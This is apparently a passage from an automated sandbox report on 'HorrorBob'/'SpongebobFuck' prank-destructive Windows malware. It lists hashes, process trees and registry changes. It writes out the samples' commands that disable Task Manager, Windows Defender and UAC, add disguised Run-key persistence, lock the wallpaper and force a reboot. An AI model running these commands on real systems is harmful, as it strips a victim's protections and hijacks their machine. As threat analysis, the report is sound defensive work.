Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1027.tmp\SpongebobFuck.cmd""

Network

N/A

Files

memory/2240-0-0x0000000000400000-0x00000000007BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1027.tmp\SpongebobFuck.cmd

MD5 7a918ed93f7fb297e05464edccc46756
SHA1 9464288fed7ba5d88928265882def5e05ffbe7db
SHA256 82fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
SHA512 cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1

memory/2240-17-0x0000000000400000-0x00000000007BF000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:57

Platform

win7-20240221-en

Max time kernel

141s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Network

N/A

Files

memory/2848-0-0x0000000000400000-0x00000000004FA000-memory.dmp

memory/2848-5-0x0000000000400000-0x00000000004FA000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:54

Platform

win10v2004-20240226-en

Max time kernel

15s

Max time network

21s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24" C:\Windows\system32\LogonUI.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4316 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 4316 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 4316 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3984 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3984 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3984 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3984 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3984 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3984 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3984 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3984 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3984 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4072 wrote to memory of 2580 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4072 wrote to memory of 2580 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4072 wrote to memory of 2580 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3984 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 3984 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 3984 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\373C.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa394b855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp

Files

memory/4316-0-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\373C.tmp\HorrorBob2.bat

MD5 b11c0b55dba339bbe3169584fa0eedd8
SHA1 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256 f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA512 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

C:\Users\Admin\AppData\Local\Temp\373C.tmp\prompt.vbs

MD5 52ac951762c9b42fb4492dfdde2ba4ae
SHA1 0821a0dea46432fc4db10a2dc6312d42a872ab9f
SHA256 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
SHA512 c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

C:\Users\Admin\AppData\Local\Temp\373C.tmp\blood.bmp

MD5 040d29b801e3488f7aee3f9708128eea
SHA1 433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256 fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA512 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

C:\Users\Admin\AppData\Local\Temp\373C.tmp\Service64.exe

MD5 ea8f1afb1f5f51d58a47e702f97736f4
SHA1 fc9417a69a28bb0dc5d71b452a059a992564f0bf
SHA256 2021adc7a1206977bc7886c997ed3024563922a1858cb2b1f6c8039d0ba29db0
SHA512 f423c33952456c9b83f8597d1d7c03ad8cf8ef4b2f95494547e5bdc15d6334e492d7da21bff7659bae9a1c98ab5865e6117aa507f3d4632c08b195b2a1ed5c29

memory/4316-18-0x0000000000400000-0x000000000132F000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:53

Platform

win7-20240215-en

Max time kernel

7s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

Signatures

Disables Task Manager via registry modification

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\Wallpaper = "c:\\System64\\bg.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1A73.tmp\horrorbob.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\System64\bg.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Kernel 64" /t REG_SZ /F /D "C:\System64\SysKern64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1A73.tmp\sp.vbs"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/2132-3-0x0000000000400000-0x0000000001D7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\horrorbob.bat

MD5 fb64a183fc63eada7f48e781677907d7
SHA1 cce8bf6ef41f689ae3fe8a5ff88aa1e550adc47d
SHA256 397e6fe317d2be9d944b8df19ea005240fedfffe09bb8fbb62042fa2a5810b20
SHA512 a8c043404c62dddf21f1521c0917970e9e46d78f0c6bba6a74a7f907cf6cf27e6ed0bac831e9bb9a44d393be6c5c8a255aa0d6ac997a49a0549feb1a14bcba5a

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\prompt.vbs

MD5 108887a0632fa8fcdc1ca1cc04fddb8b
SHA1 f4bc0266a7ed53b54027bc552ab64328623ab9cd
SHA256 8dce4ee27dac1fc5d3d11c160d8aa566a0f92c372dba5b0db47a8f9c3a8abb2e
SHA512 f11347bfdd7e37f379411d7bb58e07ccb7e080ba572e1e3776a3d64d620f02aa1a875db5bffc7eb7861c47ed545498bd13d1ce5e1a3e53dfb699d28a50166777

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\bg.bmp

MD5 58aefe14498bee4d7034d16bf49c9044
SHA1 729064acb80656d36c590422f52463c9a2b265ef
SHA256 62154672621e164b1008a301f9655cf04c55f4ba8c74157fe9737065283da86a
SHA512 b71c4e55f248a6ef5fff58c26c5d093a5b721fed4e95c772e1cede11ec45e25839cbb091e463db4c57921ca3c1c04bb1881287f7a8610f93031ad33dce64eb85

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\SysKern64.exe

MD5 4dfe61b7bd10985be30aff0bf58ae272
SHA1 67272f59d3dbfab8f2833961f352448acd9ea8ec
SHA256 13e46436cd6b276d6555c3c0499e7aaf45bd710035d8ebe83ec9f155f949e26a
SHA512 2696a2c62cda8221c1ef368af16a7196ed689cff765eaccc890a6840a39c8f8de469ca571287e92ccd93fda50860a8cdadc75660b01bdc8faa6ccaa8c9797366

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU_28176.txt

MD5 d036a9ad0dff58548e91a68c58ff7964
SHA1 8c6265a188fba55db49b6d744a74bbd78f562efd
SHA256 19af8f37f3b6510b8da2677b22aa43123a3898d830f643237a52346c5b3d763d
SHA512 6e93fbd051a9461a8c8eaeb30f9fdef74ca6a18bf9e60d3bd5fe702f2e9e0946059c6dc23975264f99363538e41ac0f9a1bc0dec54df5253c4919012d4065fc5

C:\Users\Admin\AppData\Local\Temp\1A73.tmp\sp.vbs

MD5 5bd73be3d9435a2ff6510c84bc643c0e
SHA1 de4ee1b6fbe2a364a1c5c2e8a69c196a370a3b4a
SHA256 9df6c43228d9fc70ef9698abd10435f2ae864a1364c6f860e822dc52487b0e46
SHA512 7c581bc3757fdd816282bd26419cb456c88792900294507701d809b8b0478b4fd5462398359a65a6f366aabdb623a1bc7caceda30111995fb4b1928841b279ac

memory/2132-133-0x0000000000400000-0x0000000001D7C000-memory.dmp

memory/1272-134-0x0000000002D90000-0x0000000002D91000-memory.dmp

memory/1400-135-0x0000000002B80000-0x0000000002B81000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:54

Platform

win10v2004-20240226-en

Max time kernel

7s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Kernel 64 = "C:\\System64\\SysKern64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\Desktop\Wallpaper = "c:\\System64\\bg.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4928 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 4928 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 4928 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4680 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4680 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4680 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 4680 wrote to memory of 4012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 4680 wrote to memory of 4012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 4680 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
